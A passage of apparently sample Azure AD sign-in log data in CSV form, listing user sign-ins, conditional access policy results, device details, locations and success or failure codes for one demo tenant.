'deviceId': '', 'browser': 'Chrome 80.0.3987'}",9cf72c2b-aa6a-41ec-adc7-3fa2e4c70100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,9cf72c2b-aa6a-41ec-adc7-3fa2e4c70100,SigninLogs,Sucess,33.0175209,35.44601059
+876,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:05.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ae0a9c9f-44c0-497d-87b2-a656fd8b7972,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 00:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",b6b1e129-7976-4148-98ee-f605aefb0600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b6b1e129-7976-4148-98ee-f605aefb0600,SigninLogs,Sucess,36.6404686,-78.26995087
+877,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:08.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,2aff3e2f-7870-4f85-967d-fc3772d4defe,Microsoft.aadiam,Microsoft.aadiam,,9dadd76f-3237-4e1d-84e7-e45c59867492,4,US,Azure Advanced Threat Protection,7b7531ad-5926-4f2d-8a1d-38495ad33e17,Browser,[],notApplied,09/04/2020 00:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",68d708e5-0f59-4f58-b7ee-efd2eba10500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",9dadd76f-3237-4e1d-84e7-e45c59867492,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Azure Advanced Threat Protection,68d708e5-0f59-4f58-b7ee-efd2eba10500,SigninLogs,Failed,41.90428925,-85.99833679
+878,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:05.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ae0a9c9f-44c0-497d-87b2-a656fd8b7972,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 00:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",b6b1e129-7976-4148-98ee-f605aefb0600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b6b1e129-7976-4148-98ee-f605aefb0600,SigninLogs,Sucess,36.6404686,-78.26995087
+879,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:08.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,2aff3e2f-7870-4f85-967d-fc3772d4defe,Microsoft.aadiam,Microsoft.aadiam,,9dadd76f-3237-4e1d-84e7-e45c59867492,4,US,Azure Advanced Threat Protection,7b7531ad-5926-4f2d-8a1d-38495ad33e17,Browser,[],notApplied,09/04/2020 00:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",68d708e5-0f59-4f58-b7ee-efd2eba10500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",9dadd76f-3237-4e1d-84e7-e45c59867492,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Azure Advanced Threat Protection,68d708e5-0f59-4f58-b7ee-efd2eba10500,SigninLogs,Failed,41.90428925,-85.99833679
+880,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:59.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,65809700-6d13-4b73-aead-efff2dc44ad1,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 23:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",8900d912-3d17-47c8-917b-3b43caca0500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8900d912-3d17-47c8-917b-3b43caca0500,SigninLogs,Sucess,36.6404686,-78.26995087
+881,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:05.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,16fdd2c3-049f-49a0-b463-1249ea1bb67e,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 23:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e446f264-3933-463f-bc0b-d42276530600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e446f264-3933-463f-bc0b-d42276530600,SigninLogs,Sucess,36.6404686,-78.26995087
+882,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:59.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,65809700-6d13-4b73-aead-efff2dc44ad1,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 23:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",8900d912-3d17-47c8-917b-3b43caca0500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8900d912-3d17-47c8-917b-3b43caca0500,SigninLogs,Sucess,36.6404686,-78.26995087
+883,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:55.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,9de52e56-e2df-4c5d-80b7-4ddaa05d4b35,Microsoft.aadiam,Microsoft.aadiam,,9dadd76f-3237-4e1d-84e7-e45c59867492,4,US,Azure Advanced Threat Protection,7b7531ad-5926-4f2d-8a1d-38495ad33e17,Browser,[],notApplied,08/04/2020 23:26,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",93d4df14-2ec3-46f2-a774-ff583b490600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",9dadd76f-3237-4e1d-84e7-e45c59867492,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Azure Advanced Threat Protection,93d4df14-2ec3-46f2-a774-ff583b490600,SigninLogs,Failed,41.90428925,-85.99833679
+884,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:53.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6ef9b2ea-4074-4907-b829-7aae36606cba,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Azure Advanced Threat Protection,7b7531ad-5926-4f2d-8a1d-38495ad33e17,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 23:26,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",cfab9824-c87d-41e8-8623-1f6d92350400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Azure Advanced Threat Protection,cfab9824-c87d-41e8-8623-1f6d92350400,SigninLogs,Sucess,41.90428925,-85.99833679
+885,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:09.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': 